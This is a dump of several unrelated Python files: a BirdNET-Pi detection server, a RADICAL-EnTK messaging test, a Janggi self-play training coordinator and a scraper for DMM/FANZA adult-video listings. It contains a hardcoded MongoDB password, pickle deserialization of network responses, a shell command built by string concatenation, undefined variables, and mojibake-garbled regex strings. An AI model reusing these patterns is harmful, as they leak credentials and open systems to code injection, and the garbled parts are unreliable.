Sci_Name,Com_Name = species.split('_')
score = entry[1]
Confidence = str(round(score*100))
Lat = str(args.lat)
Lon = str(args.lon)
Cutoff = str(args.min_conf)
Week = str(args.week)
Sens = str(args.sensitivity)
Overlap = str(args.overlap)
Com_Name = Com_Name.replace("'", "")
File_Name = Com_Name.replace(" ", "_") + '-' + Confidence + '-' + \
Date.replace("/", "-") + '-birdnet-' + Time + audiofmt
#Connect to SQLite Database
for attempt_number in range(3):
try:
con = sqlite3.connect(userDir + '/BirdNET-Pi/scripts/birds.db')
cur = con.cursor()
cur.execute("INSERT INTO detections VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (Date, Time, Sci_Name, Com_Name, str(score), Lat, Lon, Cutoff, Week, Sens, Overlap, File_Name))
con.commit()
con.close()
break
except:
print("Database busy")
time.sleep(2)
print(str(current_date) + ';' + str(current_time) + ';' + entry[0].replace('_', ';') + ';' + str(entry[1]) + ';' + str(args.lat) + ';' + str(args.lon) + ';' + str(min_conf) + ';' + str(week) + ';' + str(args.sensitivity) +';' + str(args.overlap) + Com_Name.replace(" ", "_") + '-' + str(score) + '-' + str(current_date) + '-birdnet-' + str(current_time) + audiofmt + '\n')
if birdweather_id != "99999":
try:
if soundscape_uploaded is False:
# POST soundscape to server
soundscape_url = "https://app.birdweather.com/api/v1/stations/" + birdweather_id + "/soundscapes" + "?timestamp=" + current_iso8601
with open(args.i, 'rb') as f:
wav_data = f.read()
response = requests.post(url=soundscape_url, data=wav_data, headers={'Content-Type': 'application/octet-stream'})
print("Soundscape POST Response Status - ", response.status_code)
sdata = response.json()
soundscape_id = sdata['soundscape']['id']
soundscape_uploaded = True
# POST detection to server
detection_url = "https://app.birdweather.com/api/v1/stations/" + birdweather_id + "/detections"
start_time = d.split(';')[0]
end_time = d.split(';')[1]
post_begin = "{ "
now_p_start = now + datetime.timedelta(seconds=float(start_time))
current_iso8601 = now_p_start.astimezone(get_localzone()).isoformat()
post_timestamp = "\"timestamp\": \"" + current_iso8601 + "\","
post_lat = "\"lat\": " + str(args.lat) + ","
post_lon = "\"lon\": " + str(args.lon) + ","
post_soundscape_id = "\"soundscapeId\": " + str(soundscape_id) + ","
post_soundscape_start_time = "\"soundscapeStartTime\": " + start_time + ","
post_soundscape_end_time = "\"soundscapeEndTime\": " + end_time + ","
post_commonName = "\"commonName\": \"" + entry[0].split('_')[1] + "\","
post_scientificName = "\"scientificName\": \"" + entry[0].split('_')[0] + "\","
post_algorithm = "\"algorithm\": " + "\"alpha\"" + ","
post_confidence = "\"confidence\": " + str(entry[1])
post_end = " }"
post_json = post_begin + post_timestamp + post_lat + post_lon + post_soundscape_id + post_soundscape_start_time + post_soundscape_end_time + post_commonName + post_scientificName + post_algorithm + post_confidence + post_end
print(post_json)
response = requests.post(detection_url, json=json.loads(post_json))
print("Detection POST Response Status - ", response.status_code)
except:
print("Cannot POST right now")
conn.send(myReturn.encode(FORMAT))
#time.sleep(3)
conn.close()
def start():
# Load model
global INTERPRETER, INCLUDE_LIST, EXCLUDE_LIST
INTERPRETER = loadModel()
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
test_sync_with_master.py
|
from radical.entk.utils.sync_initiator import sync_with_master
import pika
from radical.entk import Task, Stage, Pipeline
import radical.utils as ru
import os
from threading import Thread
MLAB = 'mongodb://entk:entk123@ds143511.mlab.com:43511/entk_0_7_4_release'
def syncer(obj, obj_type, queue1, logger, profiler):
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = int(os.environ.get('RMQ_PORT', 5672))
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))
mq_channel = mq_connection.channel()
sync_with_master(obj,
obj_type,
mq_channel,
queue1,
logger,
profiler)
mq_connection.close()
def master(obj, obj_type):
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = int(os.environ.get('RMQ_PORT', 5672))
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))
mq_channel = mq_connection.channel()
queue1 = 'test-1-2-3' # Expected queue name structure 'X-A-B-C'
queue2 = 'test-3-2-1' # Expected queue name structure 'X-C-B-A'
mq_channel.queue_declare(queue=queue1)
mq_channel.queue_declare(queue=queue2)
logger = ru.Logger('radical.entk.test')
profiler = ru.Profiler('radical.entk.test')
thread1 = Thread(target=syncer, args=(obj, obj_type, queue1, logger, profiler))
thread1.start()
while True:
method_frame, props, body = mq_channel.basic_get(queue=queue1)
if body:
mq_channel.basic_publish(exchange='',
routing_key=queue2,
properties=pika.BasicProperties(correlation_id=props.correlation_id),
body='ack')
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
break
mq_channel.queue_delete(queue=queue1)
mq_channel.queue_delete(queue=queue2)
mq_connection.close()
thread1.join()
def test_utils_sync_with_master():
obj = Task()
obj_type = 'Task'
master(obj, obj_type)
obj = Stage()
obj_type = 'Stage'
master(obj, obj_type)
obj = Pipeline()
obj_type = 'Pipeline'
master(obj, obj_type)
|
JanggiCoach.py
|
import logging
import os
import torch
import sys
from collections import deque
from pickle import Pickler, Unpickler
from random import shuffle
import struct
import numpy as np
from tqdm import tqdm
from JanggiArena import JanggiArena
from JanggiMCTS import JanggiMCTS
import torch.multiprocessing as mp
from torch.multiprocessing import Pool
from time import time, sleep
from janggi.pytorch.NNet import NNetWrapper as nn
from janggi.JanggiGame import JanggiGame as Game
import requests, pickle
import JanggiMainConstants as JMC
from janggi.JanggiConstants import *
from janggi.JanggiLogic import Board
from janggi.JanggiPlayers import *
log = logging.getLogger(__name__)
class JanggiCoach():
"""
This class executes the self-play + learning. It uses the functions defined
in Game and NeuralNet. args are specified in main.py.
"""
def __init__(self, game, nnet, args, selfPlaysPlayed = 0):
self.game = game
self.nnet = nnet
self.args = args
self.trainExamplesHistory = [] # history of examples from args.numItersForTrainExamplesHistory latest iterations
self.skipFirstSelfPlay = False # can be overriden in loadTrainExamples()
self.selfPlaysPlayed = selfPlaysPlayed
@staticmethod
def executeEpisode(eeArgs):
"""
This function executes one episode of self-play, starting with player 1.
As the game is played, each turn is added as a training example to
trainExamples. The game is played till the game ends. After the game
ends, the outcome of the game is used to assign values to each example
in trainExamples.
It uses a temp=1 if episodeStep < tempThreshold, and thereafter
uses temp=0.
Returns:
trainExamples: a list of examples of the form (encodedBoard, pi, v) #(canonicalBoard, currPlayer, pi,v)
pi is the MCTS informed policy vector, v is +1 if
the player eventually won the game, else -1.
"""
game, args, sharedQ, mctsQ, mctsQIdx, nextSelfplayQ, state_dict = eeArgs
trainExamples = []
board = game.getInitBoard()
episodeStep = 0
alternate = 1
# actionList = []
if sharedQ == None:
# nnet = nn(game, state_dict, mctsQIdx)
mcts = JanggiMCTS(game, state_dict, args)
else:
mcts = JanggiMCTS(game, sharedQ, args, True, mctsQ, mctsQIdx)
while True:
episodeStep += 1
encodedBoard = game.encodeBoard(board)
temp = int(episodeStep < args.tempThreshold)
pi = mcts.getActionProb(board, temp=temp)
trainExamples.append([encodedBoard, alternate, pi, None])
alternate = -alternate
action = np.random.choice(len(pi), p=pi)
board = game.getNextState(board, action)
r = game.getGameEnded(board)
if r != 0:
data = [(x[0], x[2], r * x[1]) for x in trainExamples]
if nextSelfplayQ != None:
nextSelfplayQ.put((True, (data, mctsQIdx)))
return data
@staticmethod
def playGame(pgArgs):
"""
Executes one episode of a game.
Returns:
winner: player who won the game (1 if player1, -1 if player2)
"""
game, args, is_rp, is_p1, checkpoint, nextSelfPlayQ = pgArgs
mcts = JanggiMCTS(g, state_dict, args)
player1 = lambda x: np.argmax(mcts.getActionProb(x, temp=0))
player2 = RandomPlayer(game).play if is_rp else GreedyJanggiPlayer(game).play
if not is_p1:
tmp = player1
player1 = player2
player2 = tmp
players = [player2, None, player1]
curPlayer = 1
board = game.getInitBoard()
it = 0
while game.getGameEnded(board) == 0:
it += 1
action = players[curPlayer + 1](board)
valids = game.getValidMoves(board)
if valids[action] == 0:
log.error(f'Action {action} is not valid! Current player is {curPlayer}')
log.debug(f'valids = {valids}')
assert valids[action] > 0
board = game.getNextState(board, action)
curPlayer *= -1
nextSelfPlayQ.put((False, (checkpoint, is_rp, game.getGameEnded(board) * (1 if is_p1 else -1))))
return 0
@staticmethod
def checkpointSCP(from_path, to_path):
"""
"""
log.info('ACQUIRING LOCK FOR SCP')
can_access = pickle.loads(requests.get(url = JMC.request_base_url+"/acquireLock").content)
while (not can_access):
sleep(10)
can_access = pickle.loads(requests.get(url = JMC.request_base_url+"/acquireLock").content)
os.system("scp "+ from_path + " " + to_path)
requests.get(url = JMC.request_base_url+"/releaseLock")
@staticmethod
def nnProcess(nnProcArgs):
"""
"""
game, updatePipe, sharedQ, gpu_num, queues, checkpoint_folder = nnProcArgs
should_update = False
lastTime = 0
nnet = nn(game, None, gpu_num)
while True:
# Check for nn updates
if updatePipe.poll():
log.info("new checkpoint exists!")
cp_name = updatePipe.recv()
while updatePipe.poll():
cp_name = updatePipe.recv()
log.info("cp_name: "+str(cp_name))
should_update = True
lastTime = time()
# Update NN if possible
if (should_update):
if (time() - lastTime > 1):
lastTime = time()
log.info('ACQUIRING LOCK FOR MOUNTED FOLDER ACCESS')
can_access = pickle.loads(requests.get(url = JMC.request_base_url+"/acquireLock").content)
if (can_access):
should_update = False
with open(JanggiCoach.getSharedStateDictFile(JMC.checkpoint_folder), 'rb') as handle:
state_dict = pickle.load(handle)
nnet.nnet.load_state_dict(state_dict)
log.info('Updated network.')
updatePipe.send(0)
requests.get(url = JMC.request_base_url+"/releaseLock")
else:
log.info('FAILED TO ACQUIRE ACCESS')
# Check for evaluation requests
req = sharedQ.get()
if req == None:
return
else:
# canonicalBoard, pipe = req
canonicalBoard, qIdx = req
s, v = nnet.predict(canonicalBoard)
queues[qIdx].put((s,v))
@staticmethod
def trainingHTTPProcess(rrProcArgs):
"""
"""
dataQ, base_url = rrProcArgs
while True:
# Receive a data point
cnt, data = pickle.loads(requests.get(url = base_url+"/getData").content)
dataQ.put((cnt, data))
sleep(10)
def learn(self):
"""
Performs iterations with numEps episodes of self-play in each
iteration. After every iteration, it retrains neural network with
examples in trainExamples (which has a maximum length of maxlenofQueue).
It then pits the new neural network against the old one and accepts it
only if it wins >= updateThreshold fraction of games.
"""
try:
mp.set_start_method('spawn')
except RuntimeError:
pass
if not self.args.is_training_client:
self.learn_selfplay_client()
else:
self.learn_training_only_client()
def learn_selfplay_client(self):
"""
Process that continuously generates self-play data
"""
manager = mp.Manager()
sharedQ = manager.Queue()
statedict_name = "Default"
# Create num_selfplay_procs queues for sending nn eval results to selfplay procs.
queues = []
for j in range(self.args.num_selfplay_procs):
queues.append(manager.Queue())
# Create num_gpu_procs queues for sending state_dict update info to nn procs.
nn_update_pipes1 = []
nn_update_pipes2 = []
for j in range(self.args.num_gpu_procs):
c1, c2 = mp.Pipe()
nn_update_pipes1.append(c1)
nn_update_pipes2.append(c2)
# Create num_gpu_procs nnProcess
nnProcs = []
for j in range(self.args.num_gpu_procs):
# Run nnProc
nnProc = mp.Process(target=JanggiCoach.nnProcess, args=[(self.game, nn_update_pipes1[j], sharedQ, self.args.gpus_to_use[j%len(self.args.gpus_to_use)], queues, self.args.checkpoint_folder)])
nnProc.daemon = True
nnProc.start()
nnProcs.append(nnProc)
# Create a queue for receiving info of finished jobs
nextSelfplayQ = manager.Queue()
# Create self-play process pool
selfplayPool = Pool(self.args.num_selfplay_procs)
# Run the first num_selfplay_procs process
ibs = pickle.loads(requests.get(url = self.args.request_base_url+"/getIBS").content)
for j in range(self.args.num_selfplay_procs):
selfplayPool.apply_async(JanggiCoach.executeEpisode, [(Game(self.game.c1, self.game.c2, mode = ibs), self.args, sharedQ, queues[j], j, nextSelfplayQ, None)])
# Continuously generate self-plays
while True:
# Check for any network updates
new_sd = pickle.loads(requests.get(url = self.args.request_base_url+"/getSD").content)
if statedict_name != new_sd:
statedict_name = new_sd
sharedStateDictFile = JanggiCoach.getSharedStateDictFile(self.args.remote_checkpoint_folder)
if (self.args.scp_base_url != None):
JanggiCoach.checkpointSCP(self.args.scp_base_url + ":" + sharedStateDictFile, sharedStateDictFile)
for q in nn_update_pipes2:
q.send(statedict_name)
q.recv()
log.info('Alerted the nn procs to update the network')
# Wait for a selfplay result
is_selfplay, q_data = nextSelfplayQ.get()
if is_selfplay:
data, finished_id = q_data
self.selfPlaysPlayed += 1
log.info(str(self.selfPlaysPlayed)+' selfplay games played. Data length = '+str(len(data)))
requests.post(url = self.args.request_base_url+"/postData", data = pickle.dumps(data))
else:
checkpoint, is_rp, did_win = q_data
log.info("Evaluated ("+str(checkpoint)+", "+str(is_rp)+", "+str(did_win)+")")
requests.post(url = self.args.request_base_url+"/uploadEvalRes", data = pickle.dumps((checkpoint, is_rp, did_win)))
# Run new selfplay
ibs = pickle.loads(requests.get(url = self.args.request_base_url+"/getIBS").content)
next_game = pickle.loads(requests.get(url = self.args.request_base_url+"/getNextGame").content)
if next_game == None:
selfplayPool.apply_async(JanggiCoach.executeEpisode, [(Game(self.game.c1, self.game.c2, mode = ibs), self.args, sharedQ, queues[finished_id], finished_id, nextSelfplayQ, None)])
else:
checkpoint, is_rp, is_p1 = next_game
assert False
def learn_training_only_client(self):
"""
Process that only trains the network
"""
untrained_cnt = 0
i = 0
# Load self-plays and train
while True:
i += 1
log.info(f'Starting Iter #{i} ... ({self.selfPlaysPlayed} games played)')
iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)
# Train a lot on the first trial to prevent infinite move masking
if (i == 1):
trainFreq = 0 if self.skipFirstSelfPlay else 100
else:
trainFreq = self.args.trainFrequency
while (untrained_cnt < trainFreq):
# Load self-plays from server
c, d = pickle.loads(requests.get(url = self.args.request_base_url+"/getData").content)
log.info(f'{c} self-play data loaded')
self.selfPlaysPlayed += c
untrained_cnt += c
iterationTrainExamples += d
if (untrained_cnt < trainFreq):
sleep(60)
log.info(f'{untrained_cnt} GAMES LOADED: TRAINING AND SAVING NEW MODEL')
# Add the server-generated examples to the iterationTrainExamples
self.trainExamplesHistory.append(iterationTrainExamples)
untrained_cnt = 0
# Update the trainExamplesHistory
if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:
log.warning(
f"Removing the oldest entry in trainExamples. len(trainExamplesHistory) = {len(self.trainExamplesHistory)}")
self.trainExamplesHistory.pop(0)
# Use at most maxDataCount data points for training
data_cnt = 0
for e in self.trainExamplesHistory:
data_cnt += len(e)
while data_cnt > self.args.maxDataCount:
data_cnt -= len(self.trainExamplesHistory[0])
self.trainExamplesHistory.pop(0)
# backup history to a file every 10 iterations
# NB! the examples were collected using the model from the previous iteration, so (i-1)
if (i % 10 == 0):
self.saveTrainExamples(self.selfPlaysPlayed)
# shuffle examples before training
trainExamples = []
for e in self.trainExamplesHistory:
trainExamples.extend(e)
shuffle(trainExamples)
log.info('TRAINING AND SAVING NEW MODEL')
self.nnet.train(trainExamples)
# Save checkpoints every iteration
self.nnet.save_checkpoint(folder=self.args.checkpoint_folder, filename=self.getCheckpointFile(self.selfPlaysPlayed))
log.info('ACQUIRING LOCK FOR MOUNTED FOLDER ACCESS')
can_access = pickle.loads(requests.get(url = self.args.request_base_url+"/acquireLock").content)
while (not can_access):
sleep(10)
can_access = pickle.loads(requests.get(url = self.args.request_base_url+"/acquireLock").content)
log.info('SAVING CHECKPOINT')
with open(JanggiCoach.getSharedStateDictFile(self.args.checkpoint_folder), 'wb') as handle:
pickle.dump({k: v.cpu() for k, v in self.nnet.nnet.state_dict().items()}, handle)
requests.get(url = self.args.request_base_url+"/releaseLock")
# Send evaluation request
requests.post(url = self.args.request_base_url+"/pushEval", data = pickle.dumps((False, self.selfPlaysPlayed)))
# Send the new state_dict
requests.post(url = self.args.request_base_url+"/updateSD", data = pickle.dumps(self.selfPlaysPlayed))
log.info('Alerted updated network')
def getCheckpointFile(self, iteration):
return 'checkpoint_' + str(iteration) + '.pickle'
@staticmethod
def getStateDictFile(self, folder, iteration):
return os.path.join(folder, 'sd_' + str(iteration) + '.pickle')
@staticmethod
def getSharedStateDictFile(folder):
return os.path.join(folder, 'sd_shared.pickle')
def saveTrainExamples(self, iteration):
folder = self.args.checkpoint_folder
if not os.path.exists(folder):
os.makedirs(folder)
filename = os.path.join(folder, self.getCheckpointFile(iteration) + ".examples")
with open(filename, "wb+") as f:
Pickler(f).dump(self.trainExamplesHistory)
f.closed
def loadTrainExamples(self):
modelFile = os.path.join(self.args.load_folder_file[0], self.args.load_folder_file[1])
examplesFile = modelFile + ".examples"
if not os.path.isfile(examplesFile):
log.warning(f'File "{examplesFile}" with trainExamples not found!')
r = input("Continue? [y|n]")
if r != "y":
sys.exit()
else:
log.info("File with trainExamples found. Loading it...")
with open(examplesFile, "rb") as f:
self.trainExamplesHistory = Unpickler(f).load()
log.info('Loading done!')
# examples based on the model were already collected (loaded)
self.skipFirstSelfPlay = True
|
dmm.py
|
# -*- coding: utf-8 -*-
import re, os
import threading
import time
from jinja2 import PackageLoader,Environment
from bs4 import BeautifulSoup
from queue import Queue
#from lxml import etree
from app.utils.requests import get_html_jp,get_html_jp_html
from app.utils.loadini import read_config
from selenium import webdriver
def findinfo(articleid):
url = "https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id=%s/" %articleid
html = get_html_jp(url)
page1 = re.findall(r'/digital/videoa/-/list/=/article=actress/id=\d+/page=(\d+)/',html)
title = re.findall(r'<title>(.*) - ใจใญๅ็ปใปใขใใซใใใใช - FANZAๅ็ป</title>',html)
if page1 == []:
page1 = 1
else:
page3 = []
for i in page1:
if i not in page3:
page3.append(int(i))
page4 = max(page3)
page1 = page4
title1 = title[0]
return (page1,title1)
def producer(in_q,articleid, page):
url1 = "https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id={}/".format(articleid)
in_q.put(url1)
for i in range(2, int(page)+1):
url = "https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id={}/page={}/".format(articleid,i)
#print(url)
in_q.put(url)
def dmmcid(in_q, out_q):
while in_q.empty() is not True:
url = in_q.get()
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id=1060823/'
html = get_html_jp(url)
list = re.findall(r'https://www.dmm.co.jp/digital/videoa/-/detail/=/cid=([_0-9a-z]+)/',html)
#print(list)
out_q.append(list)
in_q.task_done()
def dmm_thread(articleid):
start = time.time()
page, title = findinfo(articleid)
#print(page,title)
queue = Queue()
result_queue = []
#page = 9
producer_thread = threading.Thread(target=producer, args=(queue, articleid, page))
#producer_thread.daemon = True
producer_thread.start()
for index in range(int(page)+1):
consumer_thread = threading.Thread(target=dmmcid, args=(queue, result_queue))
consumer_thread.daemon = True
consumer_thread.start()
#print('ๅผๅฏ็บฟ็จๆฐ:' + str(threading.active_count()))
queue.join()
resetlist = []
for i in result_queue:
try:
for n in i:
if n not in resetlist:
resetlist.append(n)
except TypeError:
if i not in resetlist:
resetlist.append(i)
#print(resetlist)
leng = len(resetlist)
alllist = ','.join(resetlist)
end = time.time()
usetime = str(end - start)
result = '%s - ใจใญๅ็ปใปใขใใซใใใใช - FANZAๅ็ป\npage(%s)(%s),cid list =>\n%s' % (title,page,leng,alllist)
return (result,usetime)
def ciddata(html):
notitle = 0
soup = BeautifulSoup(html,'lxml')
try:
ifresult = re.findall(r'(ๆๅฎใใใใใผใธใ่ฆใคใใใพใใ)', html)
noresult = 'ๆๅฎใใใใใผใธใ่ฆใคใใใพใใ'
except:
pass
try:
if noresult in ifresult:
notitle = 1
return (noresult, notitle)
except Exception:
pass
ciddata = {}
allper = soup.find_all(name='span', id='performer')
sortper = re.findall(r'<a href=\"/digital/videoa/-/list/=/article=actress/id=(\d+)/\".*>(.*)</a>', str(allper))
perfordata = {}
for i in sortper:
perfordata[i[0]] = i[1]
if perfordata != None:
ciddata['performers'] = perfordata
else:
ciddata['performers'] = '---'
allkey = soup.find('table', attrs = {'class':'mg-b20'}).find_all('a', href = re.compile('article=keyword'))
sortkey = re.findall(r'<a href="/digital/videoa/-/list/=/article=keyword/id=(\d+)/".*>(.*?)</a>', str(allkey))
keyworddata = {}
for i in sortkey:
keyworddata[i[0]] = i[1]
if perfordata != None:
ciddata['keyword'] = keyworddata
else:
ciddata['keyword'] = '---'
scoregif = soup.find('table', attrs = {'class':'mg-b20'}).find_all('img')
try:
score = re.findall(r'https://.*/(\d)_?(\d)?.gif',str(scoregif))[0]
ciddata['score'] = score
except:
ciddata['score'] = '0-0'
try:
redkey = re.findall(r'<span class="red">(.*)</span>',html)[0]
titlebig = re.findall(r'<title>(.*)</title>',html)[0]
ciddata['title'] = redkey + ' ' + titlebig
except:
ciddata['title'] = '---'
notitle = 1
try:
ciddata['fanart_img'] = re.findall(r'<a href=\"(.*)\" target=\"_package\" name=\"package-image\"',html)[0]
except:
ciddata['fanart_img'] = '---'
try:
ciddata['distribute'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">้
ไฟก้ๅงๆฅ๏ผ</td>\n?<td>\n?(.*)</td>',html)[0]
except:
ciddata['distribute'] = '---'
try:
ciddata['release'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ๅๅ็บๅฃฒๆฅ๏ผ</td>\n?<td>\n?(.*)</td>',html)[0]
except:
ciddata['release'] = '---'
try:
ciddata['time'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ๅ้ฒๆ้๏ผ</td>\n?<td>(.*\n?.*)',html)[0]
except:
ciddata['time'] = '---'
try:
ciddata['directorid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">็ฃ็ฃ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=director/id=(\d+)/\".*>.*</a></td>',html)[0]
except:
ciddata['directorid'] = '---'
try:
ciddata['director'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">็ฃ็ฃ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=director/id=\d+/\".*>(.*)</a></td>',html)[0]
except:
ciddata['director'] = '---'
try:
ciddata['series'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ใทใชใผใบ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=series/id=\d+/\".*>(.*)</a></td>',html)[0]
except:
ciddata['series'] = '---'
try:
ciddata['seriesid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ใทใชใผใบ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=series/id=(\d+)/\".*>.*</a></td>',html)[0]
except:
ciddata['seriesid'] = '---'
try:
ciddata['maker'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ใกใผใซใผ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=maker/id=\d+/\">(.*)</a></td>',html)[0]
except:
ciddata['maker'] = '---'
try:
ciddata['makerid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ใกใผใซใผ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=maker/id=(\d+)/\">.*</a></td>',html)[0]
except:
ciddata['makerid'] = '---'
try:
ciddata['label'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ใฌใผใใซ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=label/id=\d+/\">(.*)</a></td>',html)[0]
except:
ciddata['label'] = '---'
try:
ciddata['labelid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ใฌใผใใซ๏ผ</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=label/id=(\d+)/\">.*</a></td>',html)[0]
except:
ciddata['labelid'] = '---'
try:
ciddata['cid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">ๅ็ช๏ผ</td>[\s\S]*?<td>(.*?)</td>',html)[0]
except:
ciddata['cid'] = '---'
return (ciddata,notitle)
def prevideo(searchcid):
video1 = searchcid[0]
video3 = searchcid[0:3]
videobase = 'https://cc3001.dmm.co.jp/litevideo/freepv/{}/{}/{}/{}_dmb_w.mp4'.format(video1,video3,searchcid,searchcid)
return videobase
def prevideolow(searchcid):
video1 = searchcid[0]
video3 = searchcid[0:3]
videobase = 'https://cc3001.dmm.co.jp/litevideo/freepv/{}/{}/{}/{}_sm_w.mp4'.format(video1,video3,searchcid,searchcid)
return videobase
def prephotos(searchcid):
searchurl = 'https://www.dmm.co.jp/digital/videoa/-/detail/=/cid={}/'.format(searchcid)
html = get_html_jp(searchurl)
soup = BeautifulSoup(html,'lxml')
photourlss = soup.find_all('img', attrs = {'class':'mg-b6'})
photourls = re.findall(r'(https://pics.dmm.co.jp/digital/video/.*?/.*?.jpg)', str(photourlss))
photolist = list(photourls)
#print(photolist)
jpg = []
for i in photolist:
ii = list(i)
ii.insert(-6,'jp')
iii = ''.join(ii)
iii = iii.replace('-jp','jp-',1)
jpg.append(iii)
return (jpg)
def template_cid(ciddataa):
ciddataa_performers = ciddataa.get('performers')
ciddataa_keyword = ciddataa.get('keyword')
#print(ciddataa_performers)
env = Environment(loader=PackageLoader(__name__,"templates")) # ๅๅปบไธไธชๅ
ๅ ่ฝฝๅจๅฏน่ฑก
template = env.get_template('cid.md') # ่ทๅไธไธชๆจกๆฟๆไปถ
temp_out = template.render(ciddata = ciddataa, ciddata_performers = ciddataa_performers, ciddata_keyword = ciddataa_keyword)
#print(temp_out) # ๆธฒๆ
return (temp_out)
#print(Substitute)
def dmmonecid(searchcid):
searchcid = searchcid.replace('-','00')
searchurl = 'https://www.dmm.co.jp/digital/videoa/-/detail/=/cid={}/'.format(searchcid)
html = get_html_jp(searchurl)
ciddataa,notitle = ciddata(html)
if ciddataa == 'ๆๅฎใใใใใผใธใ่ฆใคใใใพใใ':
return ciddataa,notitle
temp_out = template_cid(ciddataa)
return temp_out, notitle
def dmmsearch_data(searchstr):
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr=ไน็ฝใใใ'
url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr={}'.format(searchstr)
html = get_html_jp(url)
#ๅคๆญๆๆ ็ปๆ
try:
result = re.findall(r'(้ธๆใใๆกไปถใงๅๅใฏๅญๅจใใพใใใงใใ)',html)
noresult = '้ธๆใใๆกไปถใงๅๅใฏๅญๅจใใพใใใงใใ'
except:
pass
try:
if noresult in result:
stitle = 1
return (noresult,stitle)
except Exception:
pass
soup = BeautifulSoup(html,'lxml')
searchbody = soup.find('div',attrs = {'class' : 'd-area'})
try:
stitle = re.findall(r'<title>(.*?)</title>',html)[0]
except Exception:
stitle = 'ๆค็ดข็ตๆ'
boxall = searchbody.find_all('li',attrs = {'style' : 'width: 130px;'})
onebox = str(boxall).split('</div></li>')
boxlist = []
for box in onebox:
boxdict = {}
notitle = 0
if box:
try:
litetitle = re.findall(r'<span class=\"txt\">(.*?)</span>',box)[0]
#print(litetitle)
if litetitle == None:
notitle = 1
except:
notitle = 1
try:
cid = re.findall(r'https://www\.dmm\.co\.jp/.*?/cid=(\w+)/',box)[0]
boxdict['cid'] = cid
except Exception as e:
boxdict['cid'] = '-'
try:
keywords = re.findall(r'<span class=\"ico-st-\w+\"><span>(.*?)</span></span>',box)
keyword = ','.join(keywords)
boxdict['keyword'] = keyword
except:
boxdict['keyword'] = '-'
try:
links = re.findall(r'(https://www\.dmm\.co\.jp/.*?/cid=\w+/)',box)[0]
boxdict['links'] = links
except:
boxdict['links'] = '-'
try:
img = re.findall(r'<span class=\"img\"><img alt=\".*?\" src=\"(https://pics.dmm.co.jp/digital/video/\w+/\w+.jpg)\"/></span>',box)
boxdict['img'] = img[0]
except:
boxdict['img'] = '-'
try:
title = re.findall(r'<span class=\"img\"><img alt=\"(.*?)\" src=\"https://pics.dmm.co.jp/digital/video/\w+/\w+.jpg\"/></span>',box)
boxdict['title'] = title[0]
except:
boxdict['title'] = '-'
try:
sublinks = re.findall(r'span><a href=\"(.*?)\">.*?</a></span>',box)
sublink = 'https://www.dmm.co.jp' + sublinks[0]
boxdict['sublinks'] = sublink
except:
boxdict['sublinks'] = '-'
try:
subtexts = re.findall(r'<span><a href=\".*?\">(.*?)</a></span>',box)
boxdict['subtexts'] = subtexts[0]
except:
boxdict['subtexts'] = '-'
if notitle == 0:
#print(boxdict)
boxlist.append(boxdict)
return (boxlist,stitle)
def template_search(resultdataa,stitlee):
env = Environment(loader=PackageLoader(__name__,"templates")) # ๅๅปบไธไธชๅ
ๅ ่ฝฝๅจๅฏน่ฑก
template = env.get_template('search.md') # ่ทๅไธไธชๆจกๆฟๆไปถ
temp_out = template.render(resultdata = resultdataa,stitle = stitlee)
#print(temp_out) # ๆธฒๆ
return (temp_out)
def dmmsearch(searchstr,mode='temp'):
result, stitle = dmmsearch_data(searchstr)
if mode == 'onlysearch':
return result, stitle
noresult = '้ธๆใใๆกไปถใงๅๅใฏๅญๅจใใพใใใงใใ'
if result == noresult:
return noresult
temp_out = template_search(result, stitle)
return temp_out
def dmmlinks_data(links):
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr=ไน็ฝใใใ'
url = links
html = get_html_jp(url)
#ๅคๆญๆๆ ็ปๆ
soup = BeautifulSoup(html,'lxml')
searchbody = soup.find('div',attrs = {'class' : 'd-area'})
try:
stitle = re.findall(r'<title>(.*?)</title>',html)[0]
#print(stitle)
except Exception:
stitle = 'ๆค็ดข็ตๆ'
boxall = searchbody.find_all('li',attrs = {'style' : 'width: 130px;'})
onebox = str(boxall).split('</div></li>')
boxlist = []
for box in onebox:
boxdict = {}
notitle = 0
if box:
try:
